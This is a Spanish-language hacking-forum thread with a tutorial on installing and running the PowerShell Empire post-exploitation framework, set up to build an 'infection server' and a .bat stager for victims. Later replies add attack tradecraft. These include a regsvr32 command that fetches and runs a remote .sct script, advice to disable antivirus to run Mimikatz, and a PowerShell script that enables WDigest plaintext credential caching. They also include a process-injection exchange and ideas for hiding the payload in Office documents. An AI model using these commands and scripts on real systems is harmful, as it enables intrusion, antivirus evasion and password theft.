Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: BrowserNet en Mayo 21, 2016, 09:31:45 PM

Título: Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: BrowserNet en Mayo 21, 2016, 09:31:45 PM
(http://2.bp.blogspot.com/-WQVItDSE3C0/VjZ7GOXtsUI/AAAAAAAACoM/qGVo2JfhhmY/s1600/2.png)

Saludos mis hermanos de underc0de en esta oportunidad les traigo una herramienta llamada "Empire", según el autor data que es un agente de post-explotación PowerShell construido sobre comunicaciones cryptologically seguras y una arquitectura flexible, se parece mucho a metasploit, pero mas se asemeja pupy,  pero este siempre tendrá la sesiones de las victimas, esta herramienta fue presentada en el BSidesLV en 2015.

¿Para que sirve Empire?
Empire implementa la capacidad de ejecutar agentes PowerShell sin necesidad powershell.exe, los módulos de post-explotación de despliegue rápido que van desde los registradores de claves a Mimikatz y comunicaciones adaptables para evadir la detección de redes, todo envuelto en un marco centrado en la facilidad de uso.

sitio oficial: http://www.powershellempire.com/

Si desean ver la presentación del manejo de la herramienta, que en verdad es muy buena! pueden visitar el siguiente enlace:

http://www.slideshare.net/harmj0y/building-an-empire-with-powershell

(http://4.bp.blogspot.com/-6U2_wZkSsMs/VjbSjP43mbI/AAAAAAAACqk/Vobyz2lxF98/s640/1.png)

Instalación:

root@kali:~# git clone https://github.com/PowerShellEmpire/Empire.git
root@kali:~# cd Empire
root@kali:~/Empire# ./setup/install.sh


como vemos al instalar los módulos del empire automáticamente pasara a descargar los complementos que necesita, para poder ejecutar la herramienta con éxito.

(http://2.bp.blogspot.com/-vx3c6zyEIqI/VjZ-MC1rU1I/AAAAAAAACoY/iDX8AQ2_uNs/s640/4.png)

en mi caso algunas ya las tengo instaladas y actualizadas, pero otras no como son las siguientes que mostrare en la siguiente imagen:

(http://3.bp.blogspot.com/-ZmLjisdRGhc/VjZ_fAvsADI/AAAAAAAACok/tLDtQogpuKY/s1600/5.png)

en mi caso salio un error en la sintaxis 15 referente al archivo ./setup_database.py, algunas personas siempre ignoran un pequeño error de una linea  y trata de ejecutar el Empire u otra herramienta con normalidad y al final les arrojaría los errores comunes.

root@kali:~/Empire# ./empire

(http://1.bp.blogspot.com/-PokukvhJlDo/VjaBz1D52vI/AAAAAAAACow/cF3nXYfxCVo/s1600/1.png)

yo creo que el 60% se rendiría y no ejecutaría la herramienta, hasta nosotros lo hemos hecho pero estamos aquí referentes para dar el consejo "Lean", si nos dice que no se encuentra dicho archivo lo que haremos sera entrar a la carpeta setup y ejecutar el archivo setup_database.py para instalar la base de datos

root@kali:~/Empire# cd setup
root@kali:~/Empire/setup# python setup_database.py


(http://3.bp.blogspot.com/-kBM4KwdobdQ/VjaC32dVgsI/AAAAAAAACo8/Y0-2CZKTXWs/s1600/2.png)

Una ves que términos todo este proceso, pasaremos a configurar e instalar nuestro certificado, en el archivo "cert.sh.

root@kali:~/Empire/setup# ./cert.sh

(http://1.bp.blogspot.com/-uNwtyYnErt4/Vja51oN1vFI/AAAAAAAACpM/E4tOfXeTbNs/s640/3.png)

Luego de ello, nos dirigiremos a la carpeta de inicio y ejecutaremos el Empire

root@kali:~/Empire/setup# cd ..
root@kali:~/Empire# ./empire


(http://3.bp.blogspot.com/-WQVItDSE3C0/VjZ7GOXtsUI/AAAAAAAACoQ/g1FE8h9H2SE/s640/2.png)

como vemos nos cargar perfectamente sin ningún error, entonces vayamos prácticamente a la acción como se dice en Perú, "Menos floro y mas acción", vamos a configurar nuestro servidor de infección iremos a la sección "Listeners", como podemos observar añadí el nombre initial , ustedes pueden poner lo que gusten.

(Empire) > listeners
(Empire: listeners) > info
(Empire: listeners) > set Name initial
(Empire: listeners) > execute
(Empire: listeners) > list


(http://4.bp.blogspot.com/-suz3hnhroUg/Vja-4SaVn0I/AAAAAAAACpk/CcVoIHRVgsI/s1600/3.png)
(http://1.bp.blogspot.com/-ZcsAkIgONPk/Vja_HOC-RrI/AAAAAAAACps/9R1cr7Hwnko/s1600/1.png)

lo que haremos sera interactuar con la plataforma y empezaremos  a buscar e interpretar un archivo ejecutable pero en extensión .bat.

(Empire: listeners) > usestager launcher_bat initial


la cual se genero en la ultima linea:
Título: Re:Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: Mick Thomson en Agosto 14, 2016, 04:16:24 PM
¿existe alguna forma de ocultar el .bat en algun tipo de macro para camuflajearlo en un documento de Microsoft Office?
Título: Re:Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: cybervaca en Agosto 17, 2016, 04:35:10 AM
En muchas maneras de "esconder" el .bat o el script que crea el agente.

Te dejo aqui algunas opciones que tienes.

1. Meter el script en un .exe. ¿Como puedes hacer esto?, con muchas aplicaciones, como por ejemplo "iexpress.exe".
2. Usar un exploit el cual sea funcional para la victima, y de payload windows/exec y el script que te crea el empire.
3. Haciendo un bypass con regsvr32 /s /n /u /i:http://www.nuestraweb.com/empire.sct. Dentro del SCT se puede embeber un wscript que lance el powershell.

Con esto lo que te venimos a decir, que hay miles de maneras de hacerlo, sólo, hay que tener imaginación.

Ya que estamos hablando de empire, uno de los payloads es mimikatz. ¿Hay alguien que haya conseguido encodearlo para que haga un bypass con los antivirus?

Yo lo que hago es desactivar el antivirus porque mimikatz es detectable...


Si os gusta el powershell como lenguaje de post explotacion.

Echarle un ojo a este script:

https://github.com/putterpanda/mimikittenz

Este script es capaz de leer el user y password en texto plano desde la memoria.


Por cierto, para que te funcione debes crear un clave en el reg.

Te dejo un script que me hice para crearla con un bypass:


param(
[string]$Activar="si"

)

$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"}

######################################################################################################################

$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential

######################################################################################################################


if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." }
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key  -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."}
Título: Re:Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: Intlock en Agosto 21, 2016, 01:46:45 PM
(Empire: PhishedUserHigh) > psinject initial 392
(Empire: management/psinject) > execute

Inicia el job pero no se inyecta, que podría ser?
Título: Re:Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: EPARA en Agosto 24, 2016, 09:25:10 PM
Coño muy bueno el tuto, en lo que el tiempo me lo permita lo pondre a prueba y comentare, Gracias! Bro...
Título: Re:Empire la nueva herramienta de PowerShell & Post-Explotación
Publicado por: cybervaca en Agosto 25, 2016, 06:37:50 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
(Empire: PhishedUserHigh) > psinject initial 392
(Empire: management/psinject) > execute

Inicia el job pero no se inyecta, que podría ser?

Quizá no te injecta porque no tienes permisos de administrador local. ¿Te sale un * como que tienes privilegios de administracion local?